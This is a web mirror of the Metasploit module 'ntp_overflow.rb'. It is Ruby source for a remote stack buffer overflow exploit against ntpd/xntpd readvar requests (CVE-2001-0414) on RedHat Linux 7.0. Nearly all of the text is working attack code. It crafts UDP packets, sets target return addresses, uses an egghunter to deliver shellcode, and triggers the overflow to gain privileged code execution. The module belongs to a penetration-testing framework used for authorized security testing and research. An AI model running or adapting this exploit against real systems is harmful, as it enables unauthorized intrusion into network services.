Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ntp/ntp_overflow.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'NTP Daemon readvar Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack based buffer overflow in the

19
          ntpd and xntpd service. By sending an overly long 'readvar'

20
          request it is possible to execute code remotely. As the stack

21
          is corrupted, this module uses the Egghunter technique.

22
        },

23
        'Author' => 'aushack',

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2001-0414' ],

27
          [ 'OSVDB', '805' ],

28
          [ 'BID', '2540' ],

29
          [ 'US-CERT-VU', '970472' ],

30
        ],

31
        'Payload' => {

32
          'Space' => 220,

33
          'BadChars' => "\x00\x01\x02\x16,=",

34
          'StackAdjustment' => -3500,

35
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)

36
          'Compat' =>

37
                      {

38
                        'ConnectionType' => '-reverse',

39
                      },

40
        },

41
        'Platform' => [ 'linux' ],

42
        'Arch'	=> [ ARCH_X86 ],

43
        'Targets' => [

44
          [ 'RedHat Linux 7.0 ntpd 4.0.99j',	{ 'Ret' => 0xbffffbb0 } ],

45
          [ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug',	{ 'Ret' => 0xbffff980 } ],

46
          [ 'RedHat Linux 7.0 ntpd 4.0.99k',	{ 'Ret' => 0xbffffbb0 } ],

47
          # [ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],

48
          [ 'Debugging',	{ 'Ret' => 0xdeadbeef } ],

49
        ],

50
        'Privileged' => true,

51
        'DisclosureDate' => '2001-04-04',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options([Opt::RPORT(123)])

62
  end

63


64
  def exploit

65
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

66
    egg = hunter[1]

67


68
    connect_udp

69


70
    pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="

71
    pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

72


73
    sploit = pkt1 + make_nops(512 - pkt1.length)

74
    sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')

75
    sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

76


77
    print_status("Trying target #{target.name}...")

78


79
    print_status("Sending hunter")

80
    udp_sock.put(sploit)

81
    select(nil, nil, nil, 0.5)

82


83
    print_status("Sending payload")

84
    udp_sock.put(pkt1 + egg)

85
    select(nil, nil, nil, 0.5)

86


87
    print_status("Calling overflow trigger")

88
    udp_sock.put(pkt2)

89
    select(nil, nil, nil, 0.5)

90


91
    handler

92
    disconnect_udp

93
  end

94
end

95


96